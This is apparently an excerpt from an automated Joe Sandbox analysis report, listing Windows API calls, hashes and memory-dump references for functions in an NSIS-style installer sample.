                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                    • String ID:
                                                    • API String ID: 2667972263-0
                                                    • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                    • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                    • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                    • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                    APIs
                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CloseEnum$DeleteValue
                                                    • String ID:
                                                    • API String ID: 1354259210-0
                                                    • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                    • Instruction ID: 48bf034c557530f45265713f896c64b121a5f1f2f5b25ab6521791cb913d5ed3
                                                    • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                    • Instruction Fuzzy Hash: 74215A7150010ABFDF119F90CE89EEF7B7DEB54388F110076B949B11A0D7B49E54AA68
                                                    APIs
                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                    • String ID:
                                                    • API String ID: 1849352358-0
                                                    • Opcode ID: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                    • Instruction ID: 002387d4b88dbb62f40c54eb0dee3f9a721ef30fc2dbb8ae50818b7fec09efb0
                                                    • Opcode Fuzzy Hash: b4553b6f8f96a3615d4cb1d74016621c3cb3daa09826911c1e5c071ec9b0e61c
                                                    • Instruction Fuzzy Hash: 0F21F872A00119AFCB15DF98DE45AEEBBB5EB08304F14003AF945F62A0D7789D41DB98
                                                    APIs
                                                    • GetDC.USER32(?), ref: 00401E56
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
                                                    • ReleaseDC.USER32(?,00000000), ref: 00401E89
                                                    • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                    • String ID:
                                                    • API String ID: 3808545654-0
                                                    • Opcode ID: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                    • Instruction ID: 1c21784e8a12ec6bf8935da156a17e2c336e66cb5fe6e154f3a2125ab74843e9
                                                    • Opcode Fuzzy Hash: 12fc5c0feb0b51e7a773ba9164babbc76b3b82788c0ea370a0f868ab0e4caa48
                                                    • Instruction Fuzzy Hash: 5A018871954240EFE7015BB4AE9ABDD3FB5AF15301F10497AF141B61E2C6B90445DB3C
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Timeout
                                                    • String ID: !
                                                    • API String ID: 1777923405-2657877971
                                                    • Opcode ID: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                    • Instruction ID: dc9a0f57bab323a5eda2152a626e9899419b02716f24503a8b80c8a4184e75e9
                                                    • Opcode Fuzzy Hash: 0b60248b2d317c3fadb7ed9affa728e8142f9e62085aaabdbec9824b10747ad3
                                                    • Instruction Fuzzy Hash: E921AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941CB98
                                                    APIs
                                                    • lstrlenW.KERNEL32(00422F08,00422F08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DEE
                                                    • wsprintfW.USER32 ref: 00404DF7
                                                    • SetDlgItemTextW.USER32(?,00422F08), ref: 00404E0A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: ItemTextlstrlenwsprintf
                                                    • String ID: %u.%u%s%s
                                                    • API String ID: 3540041739-3551169577
                                                    • Opcode ID: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                    • Instruction ID: 33e626053c854acaf0ea976fdeb40ece7b69d158cb37adfcb571004cb6629101
                                                    • Opcode Fuzzy Hash: 808c56ceb77bc8fa6bb0a4fcfba6dc4e55d7e9e185af3d36fc5e6f51395c7837
                                                    • Instruction Fuzzy Hash: 2C11EB7360412877DB00666DAC46EAE329DDF85334F250237FA66F31D5EA79C92242E8
                                                    APIs
                                                    • lstrlenW.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004034E9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405DF6
                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004034E9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405E00
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E12
                                                    Strings
                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DF0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CharPrevlstrcatlstrlen
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                    • API String ID: 2659869361-2382934351
                                                    • Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                    • Instruction ID: dcf52917e326d6ada13c2a72ecce68a7b96b6e8782615359caad44c872c99b85
                                                    • Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
                                                    • Instruction Fuzzy Hash: EBD05EB1101634AAC2116B48AC04CDF62AC9E86704381402AF141B20A6C7785D6296ED
                                                    APIs
                                                    • DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
                                                    • GetTickCount.KERNEL32 ref: 0040304F
                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                                                    • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                    • String ID:
                                                    • API String ID: 2102729457-0
                                                    • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                    • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                                                    • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                                                    • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                                                    APIs
                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,00425710,?,00405F0F,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                    • lstrlenW.KERNEL32(00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,00434000), ref: 00405F51
                                                    • GetFileAttributesW.KERNEL32(00425710,00425710,00425710,00425710,00425710,00425710,00000000,00425710,00425710,771B3420,?,C:\Users\user~1\AppData\Local\Temp\,00405C4D,?,771B3420,C:\Users\user~1\AppData\Local\Temp\), ref: 00405F61
                                                    Strings
                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405EF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                    • API String ID: 3248276644-2382934351
                                                    • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                    • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                    • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                    • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                    APIs
                                                    • IsWindowVisible.USER32(?), ref: 00405549
                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                                      • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Window$CallMessageProcSendVisible
                                                    • String ID:
                                                    • API String ID: 3748168415-3916222277
                                                    • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                    • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                                                    • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                                                    • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,: Completed,?,00000000,00406660,80000002), ref: 00406435
                                                    • RegCloseKey.ADVAPI32(?), ref: 00406440
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: CloseQueryValue
                                                    • String ID: : Completed
                                                    • API String ID: 3356406503-2954849223
                                                    • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                    • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                    • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                    • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,771B3420,00000000,C:\Users\user~1\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                                                    • GlobalFree.KERNEL32(00000000), ref: 00403B7F
                                                    Strings
                                                    • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403B5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1325850029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1325834844.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325865636.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1325882546.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1326032756.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_lSmb6nDsrC.jbxd
                                                    Similarity
                                                    • API ID: Free$GlobalLibrary
                                                    • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                    • API String ID: 1100898210-2382934351
                                                    • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                                                    • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                                                    • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
